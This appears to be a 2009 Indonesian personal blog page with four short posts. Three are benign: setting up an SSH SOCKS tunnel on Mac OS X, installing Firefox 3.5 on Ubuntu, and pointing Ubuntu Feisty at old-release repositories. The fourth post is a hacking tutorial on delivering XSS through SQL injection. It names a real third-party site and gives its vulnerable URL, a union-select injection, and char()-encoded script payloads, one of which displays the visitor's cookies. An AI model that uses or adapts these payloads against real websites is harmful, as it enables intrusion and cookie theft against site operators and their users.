10 August 2009

SSH Tunnel MAC OS X

SSH tunnel di MAC OSX pada dasarnya sama seperti di Linux.
Langsung saja..



  • click finder di dock

  • click application

  • masuk ke folder Utilities

  • dan pilih terminal.




Di terminal ketik

ssh -D [port] -l [username] [hostname]


Keterangan:
port = port tunnel
username = user login SSH server
hostname = Ip atau hostname SSH server

Contoh:
ssh -D 1080 -l root 10.10.21.1


Kemudian di tanya password, masukan password SSH server.

Tinggal pasang aja 127.0.0.1 port 1080 sock5.


Read more...

di 1:35 AM

Share |
4 komentar

Label: ,

06 August 2009

XSS dari SQL Injection

Nyoba XSS dari SQL injection!!!!
Cukup mudah tinggal rubah code javascript ke bentuk ASCII dan masukan ke dalam SQL injection.


Contoh:

String:
< script>alert('irvian')< /script> <--- tanpa spasi

ASCII:
char(60,115,99,114,105,112,116,62,97,108,101,114,116,40,39,105,114,118,105,97,110,39,41,60,47,115,99,114,105,112,116,62)

Untuk mempermudah gunakan tool di perl di http://h1.ripway.com/irvian/ascii.txt

Penerapan pada target

Target:
http://www.cpme.be

Vuln SQL:
http://www.cpme.be/content.php?c=-patient_safety%27+union+select+0,1,2,3/*

Injection XSS:
http://www.cpme.be/content.php?c=-patient_safety%27+union+select+0,null,char%2860,115,99,114,105,112,116,62,97,108,101,114,116,40,39,105,114,118,105,97,110,39,41,60,47,115,99,114,105,112,116,62%29,3'

Jika muncul textbox irvian berarti javascript berhasil di load.

String:
< script>alert(document.cookie)< /script> <--- tanpa spasi

ASCII:
char(60,115,99,114,105,112,116,62,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,60,47,115,99,114,105,112,116,62)

Injection XSS:
http://www.cpme.be/content.php?c=-patient_safety%27+union+select+0,null,char%2860,115,99,114,105,112,116,62,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,60,47,115,99,114,105,112,116,62%29,3'

terlihat textbox mengeluarkan isicookies.


sumber:
http://milw0rm.com/papers/363

Read more...

di 10:20 PM

Share |
0 komentar

Label:

01 August 2009

Install Firefox 3.5 on Ubuntu

Install Firefox 3.5 on Ubuntu.

Edit /etc/apt/sources.list and add the following launchpad repo.



For Ubuntu Hardy
deb http://ppa.launchpad.net/ubuntu-mozilla-daily/ppa/ubuntu hardy main


For Ubuntu Jaunty
deb http://ppa.launchpad.net/ubuntu-mozilla-daily/ppa/ubuntu jaunty main


And then do this command

$sudo apt-get update
$sudo apt-get install firefox-3.5

Run firefox 3.5 on Applications > Internet > Shiretoko Web Browser


Read more...

di 4:51 AM

Share |
2 komentar

Label:

repository ubuntu feisty

Ubuntu Ubuntu 7.04 (Feisty Fawn) repository move to old-releases.ubuntu.com.

So...


edit /etc/sources.list and add the following launchpad

deb http://old-releases.ubuntu.com/ubuntu/ feisty main restricted universe multiverse
deb http://old-releases.ubuntu.com/ubuntu/ feisty-updates main restricted universe multiverse
deb http://old-releases.ubuntu.com/ubuntu/ feisty-backports main restricted universe multiverse
deb http://old-releases.ubuntu.com/ubuntu/ feisty-security main restricted universe multiverse
deb http://old-releases.ubuntu.com/ubuntu/ feisty-proposed main restricted universe multiverse

and then update

$ sudo apt-get update

Read more...

di 4:39 AM

Share |
1 komentar

Label:

Subscribe to: Comments (Atom)
powered by irvian